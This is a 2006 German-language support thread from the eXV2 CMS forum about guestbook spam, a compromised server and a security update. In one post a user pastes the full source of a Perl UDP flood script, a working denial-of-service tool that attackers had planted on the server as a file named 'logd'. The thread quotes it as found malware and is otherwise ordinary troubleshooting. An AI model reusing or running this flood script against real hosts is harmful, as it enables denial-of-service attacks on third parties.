Content Management System - CMS : eXV2 
Home
News
Forum
Downloads
Download Module
Sitemap
Partnerseiten
RSS News
Kontakt/Info
Sprache
EnglishFrench
Suchen
Login
Nickname
Passwort

Registrieren?
Passwort?
Navigation
 Home News  Forum Neueste Beiträge  Downloads Download Module eXV² Themes  Weblinks Tutorial Changelog 2.3.1 Jobcenter Gebrauchtmarkt OSMap  Sponsor Kalendersystem Sitemap Partnerseiten RSS News Kontakt/Info Webseiten Wetter
Willkommen im Free Web CMS : eXV² Forum!
  Forenarchiv
     Module
  xtremguestbook Antispam trotzdem Spams

Forum : Module

Titel : xtremguestbook Antispam trotzdem Spams

© 2004-2012 www.exv2.de
http://www.exv2.de

URL dieser Diskussion
http://www.exv2.de/modules/newbb_plus/viewtopic.php?topic_id=3484&forum=11

 Alphaman :

25.07.2006 18:41
 Hi Leute,

ich hab ein dickes fettes Problem. Unser Gästebuch xtremguestbook mit der schon vorhandenen AntiSpam Funktion (Version 1.51) wird trotzdem vollgespammt von einem Rotot.

Ich weiss derzeit nicht wie sie es machen aber die Sicherheitsabfrage ist drinne bei Gastbenutzern.

Kann mir wer bitte Helfen. Das ist echt nervig wenn man am Tag mindestens 100 Stck löschen muss.

Danke im Voraus.

Gruß,
Torakas

ps. Es handelt sich um die Webseite www.bowhunter-bergstrasse.de

 Nobse :

25.07.2006 20:22
 Ist bekannt das diese Methode nicht mehr sicher ist.
Must halt erstmal das Module auf moderieren stellen.

 Alphaman :

26.07.2006 15:27
 Das ist schlecht.. Dann werde ich es erstmal deaktivieren und mir wohl was anderes suchen muessen.

Gruß,
Alphaman

 Nobse :

26.07.2006 16:26
 Es gibt schon eine Überarbeitete Version die aber erst mit version 2.0.4.3 zusammen spielt.
Also noch etwas gedult.

 mipli :

02.10.2006 12:32
 Gibt es die angepasste Version schon?
Bei tritt dieses Phänomen der MassenSpamEinträge täglich auf und am letzten Wochenende wurde uns auch der Server stillgelegt. Nachdem der Ordner vom Gästebuch deaktiviert wurde, konnten wir unsere Seite wieder betreiben.

Wir setzen die Version 1.51 ein, das ist doch immer noch die aktuelle Version, oder nicht? ExV2 betreiben wir in der aktuellen Version 2.0.4.3, darin sollten ja alle Sicherheitsupdates enthalten sein, bis viellechit auf das letzte im September.

Kann es sein, dass Spammer über des XTREMGUESTBOOK Massenmails verschicken können? Dies war der Grund für die Deaktivierung.

Danke für eine Info und Grüsse,
Mipli.

 p-tree :

02.10.2006 13:20
 Moin!
Die Massenmails werden wahrscheinlich eher durch die Lücke geschickt, die durch das von dir erwähnte letzte Service-Pack aus dem September geschlossen wurde!

DRINGEND dieses Update einspielen!
Mehr dazu hier:
http://www.exv2.de/modules/newbb_plus/viewtopic.php?topic_id=3590&forum=25
und hier
http://www.exv2.de/modules/newbb_plus/viewtopic.php?topic_id=3592&forum=25

http://www.exv2.de/modules/newbb_plus/viewtopic.php?topic_id=3589&forum=25

Zum Gästebuch wird sicher Nobse oder Bama mehr sagen können.

 mipli :

02.10.2006 14:10
 danke für die Antwort, ich werde das umgehend erledigen und hoffe dass es das war.

Grüsse, Mipli.

 mipli :

02.10.2006 15:12
 Nachtrag:
Ich habe das Sicherheitsupdate installiert und in der Tat wurden 2 PHP-Files mit fragwürdigem Inhalt und ein Ordner mit Endung .PHP in dem Ordner images/library gefunden.
Was nicht gefunden wurde waren 2 ASCII-Files, welche auch nicht nach Original, sondern eher nach Hackerursprung ausgesehen haben, die habe ich aber auch noch beseitigt.

Ich hoffe, dass dies alles war.

Ist ein Update auf das XTREMGUESTBOOK geplant mit verbesserter Sicherheitsabfrage?

Grüsse, Mipli.

 Picl :

02.10.2006 15:24
 Könntest du uns bitte mitteilen, um welche ASCII-Files es sich gehandelt hat, denke der Security-Check sollte die schon finden, insofern wäre die Info ganz gut.


Greetz,

Picl

 mipli :

02.10.2006 16:41
 Sorry, habe leider zu wenig nachgedacht, aber ein File ist noch im Papierkorb drin. Ich kann es nicht mehr wiederherstellen, aber den Inhalt auslesen:

Name: logd

Inhalt:

#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");



if ($ARGV[1] ==0 &amp;&amp; $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 &amp;&amp; $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &amp;");
goto packets;
}
if ($ARGV[1] !=0 &amp;&amp; $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 &amp;&amp; $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &amp;");
goto randpackets;
}

packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

Grüsse,
Mipli.

 Nobse :

02.10.2006 20:33
 Las es mal lieber im Papierkorb und lösche diesen dann auch.

xtremguestbook
ich bin nicht 100% auf dem neusten Stand und Bama ist zur Zeit nicht anwesend.
Ich werde es aber mal hier im Forum zum Testen reinstellen.

 mipli :

04.10.2006 14:05
 Hi Nobse,
ich habe das Gästebuch mal installiert und es gibt ja keine Sicherheitsabfrage mehr. Wie wird hier sonst Spamming verhindert?

Merci für eine Info und Gruss,
Mipli.

 Nobse :

05.10.2006 09:48
 Wie das funktioniert werde ich hier nicht verraten.
Bitte dann auch mal Rückmeldung wie es läuft.

 habacus :

05.10.2006 09:50
 hallo mipli

bist du evtl. als admin oder registrierter benutzer eigelogt und gehst danach ins gästebuch?

wenn ja wird dir die sicherheitsabfrage nicht angezeigt. diese wird nur bei gästen angezeigt. so ist es jedenfalls bei mir.

gruss
habacus

 mipli :

05.10.2006 10:53
 Nein, als Gast habe ich eine Eintrag gemacht. Ich habe das Gästebuch sofort deinstalliert und die Version 1.51 wieder aktiviert.
Da wir innert 2 Tagen 3X den Server abgeschaltet bekommen haben, teste ich nichts mehr auf dem Server.

Ich habe den Programmstand gelöscht und komplett neu isntalliert. Unsere eigenen Skripte nochmal gecheckt und dann erst wieder eingespielt, der Stand sollte jetzt sauber sein.


Ich bin im Moment sogar soweit im Wiederholungsfall der Attacken den Betrieb von EXV2 einbzustellen und alles wieder in HTML zu machen. Keine Skripte, kein Forum, kein Gästebuch, nur reine Information. Traurig aber wahr.

Ich wollte hier nicht die Technik publiziert wissen, wie das Spamming im GB verhindert wird, sondern lediglich ob was an der Funktion verändert wurde, bzw. ob dies tatsächlich verhindert wird.

Danke für Eure Informationen und Tipps,
Mipli.

 mipli :

10.10.2006 12:39
 Nun habe das XTREMGUESTBOOK V1.52 doch installiert, es wird zwar weiterhin versucht Einträge zu tätigen, allerdings werden bei dieser Version keine Einträge getätigt, ich erhalte lediglich eine Mail mit dem Hinweis, dass ein unerlaubter Zugriff gemacht wurde.

@Nobse: vielen Dank

Der nächste Schritt ist nun die Moderierung aufzuheben und weiter zu beobachten, ob sich vielleicht doch noch der eine oder andere Spammer eintragen kann.

Ich werde weiter berichten.

Grüsse,
Mipli.
Partnerseiten
http://service.bama-webdesign.de/

Vote für eXV2
php
Kontakt/Info
  Kontakt
  Impressum
  Link zu uns
  AGB
  Datenschutzhinweis		Downloads
  eXV² Core
  Core Sprachfiles		eXV² Filecenter
  Downloads
  Download Module
  eXV² Themes
  Multilanguage Module
  Sprachfiles eXV² Module		eXV² Support
  France

Powered by eXV² Vers. 2.3.1 © 2004-2012 www.exv2.de